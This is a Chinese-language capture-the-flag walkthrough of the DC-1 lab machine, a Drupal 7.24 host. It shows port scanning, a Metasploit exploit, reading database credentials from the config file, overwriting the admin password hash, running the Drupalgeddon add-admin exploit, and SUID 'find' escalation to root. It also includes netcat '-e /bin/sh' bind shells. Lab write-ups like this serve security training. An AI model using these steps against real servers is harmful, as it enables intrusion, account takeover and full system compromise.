DC-1
信息收集
Nmap scan report for 192.168.33.136
Host is up (0.0013s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
MAC Address: 00:0C:29:34:9E:E8 (VMware)
ip:192.168.33.136
端口:
22/tcp open ssh 80/tcp open http 111/tcp open rpcbind
22:试着尝试ssh免密登录???
这里可以尝试hydra爆破一波,但爆破不出来。
80:直接访问网页
用dirsearch扫了一下:
[08:46:04] 200 - 1KB - /COPYRIGHT.txt
[08:46:14] 200 - 17KB - /INSTALL
[08:46:15] 200 - 1KB - /INSTALL.mysql.txt
[08:46:15] 200 - 2KB - /INSTALL.pgsql.txt
[08:46:15] 200 - 17KB - /INSTALL.txt
[08:46:16] 200 - 18KB - /LICENSE
[08:46:16] 200 - 18KB - /LICENSE.txt
[08:46:16] 200 - 8KB - /MAINTAINERS.txt
[08:46:22] 200 - 5KB - /README
[08:46:23] 200 - 5KB - /README.txt
[08:46:33] 200 - 9KB - /UPGRADE
[08:46:33] 200 - 9KB - /UPGRADE.txt
[08:51:42] 301 - 319B - /includes -> http://192.168.33.136/includes/
[08:51:46] 200 - 7KB - /index.php
[08:52:37] 301 - 315B - /misc -> http://192.168.33.136/misc/
[08:52:41] 301 - 318B - /modules -> http://192.168.33.136/modules/
[08:52:57] 200 - 7KB - /node
[08:53:50] 301 - 319B - /profiles -> http://192.168.33.136/profiles/
[08:54:06] 200 - 2KB - /robots.txt
[08:54:11] 301 - 318B - /scripts -> http://192.168.33.136/scripts/
[08:54:31] 301 - 316B - /sites -> http://192.168.33.136/sites/
[08:54:32] 200 - 952B - /sites/all/modules/README.txt
[08:54:32] 200 - 0B - /sites/example.sites.php
[08:54:32] 200 - 904B - /sites/README.txt
[08:54:32] 200 - 767B - /sites/all/themes/README.txt
[08:55:04] 301 - 317B - /themes -> http://192.168.33.136/themes/
[08:55:22] 200 - 7KB - /user
[08:55:22] 200 - 7KB - /user/
[08:55:23] 200 - 7KB - /user/login/
[08:55:37] 200 - 2KB - /web.config
[08:55:58] 200 - 42B - /xmlrpc.php
robots.txt
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites like Yahoo!
# and Google. By telling these "robots" where not to go on your site,
# you save bandwidth and server resources.
#
# This file will be ignored unless it is at the root of your host:
# Used: http://example.com/robots.txt
# Ignored: http://example.com/site/robots.txt
#
# For more information about the robots.txt standard, see:
# http://www.robotstxt.org/wc/robots.html
#
# For syntax checking, see:
# http://www.sxw.org.uk/computing/robots/check.html
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
flag1
msfconsole:
use 对应模块
show options 查看信息
set rhosts 远程主机ip
run 攻击
exploit 攻击
shell 拿到权限
使用python反弹一个交互式shell【方便后续操作】
方法一:
shell #权限,不是本地,是http链接,需要一个持久链接,反弹一个交互shell
python -c "import pty;pty.spawn('/bin/bash')"
方法二:
find /var/www/test -exec nc -lvp 9999 -e /bin/sh ;
nc 192.168.0.119 9999
/var/www/profiles/testing:
version = "7.24"
project = "drupal"
datestamp = "1384983240"
flag2
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
进入数据库,查看users表,发现admin的密码被加密。
flag3
方法一:【修改管理员密码】
查看官网文档+StackOverflow
发现mysql加密脚本
php scripts/password-hash.sh 'pass'
www-data@DC-1:/var/www$ php scripts/password-hash.sh 'passwd'
php scripts/password-hash.sh 'passwd'
password: passwd hash: $S$DYUw2bI4eMoDktLEjoauViDb4yDZCQBI0bA7yoJa3oZNRHcZQgQH
www-data@DC-1:/var/www$ php scripts/password-hash.sh ppap
php scripts/password-hash.sh ppap
password: ppap hash: $S$DCKCzF/33eff52x/Po.lQ5bYwDBAy8oVs/8mZ7.GNaXFkjxyixXi
我们虽然不能解密密码可是可以更新管理员的密码:
update users SET pass='$S$D5iUQJACoD2gCDtE0WaoCMmsoNPVD7Q84aXuHjuoIKwHhD9aKh9Z' where name='admin';
方法二:【添加具有管理员权限的用户】
//查看具体版本
cat includes/bootstrap.inc | grep VERSION
define('VERSION', '7.24');
$has_openssl = version_compare(PHP_VERSION, '5.3.4', '>=') && function_exists('openssl_random_pseudo_bytes');
searchsploit Drupal
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php
┌──(root💀AGsite)-[/usr/share/exploitdb/exploits/php/webapps]
└─# python 34992.py -t http://192.168.33.136 -u userAG -p 123456
flag3
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
flag4
在/etc/passwd里找到:
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
打开发现
www-data@DC-1:/home/flag4$ cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
thefinalflag
估计是要提权了
【SUID提权】
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb { }
www-data@DC-1:/home/flag4$ find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
发现可以find提权
www-data@DC-1:/home/flag4$ find -name flag4.txt -exec "whoami" \;
find -name flag4.txt -exec "whoami" \;
root
法一:【直接提权】
提权:
www-data@DC-1:/home/flag4$ find -name flag4.txt -exec "/bin/sh" \;
find -name flag4.txt -exec "/bin/sh" \;
# whoami
whoami
root
即可打开finalflag.txt
cat thefinalflag.txt
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
法二:【提升netcat权限】
www-data@DC-1:/home/flag4$ find flag4.txt -exec netcat -lvp 2233 -e "/bin/sh" \;
<find flag4.txt -exec netcat -lvp 2233 -e "/bin/sh" \;
listening on [any] 2233 ...
192.168.33.128: inverse host lookup failed: Host name lookup failure
connect to [192.168.33.136] from (UNKNOWN) [192.168.33.128] 49168
另外一个没有msfconsole的终端:
netcat 192.168.33.136 2233
之后正常执行就可以了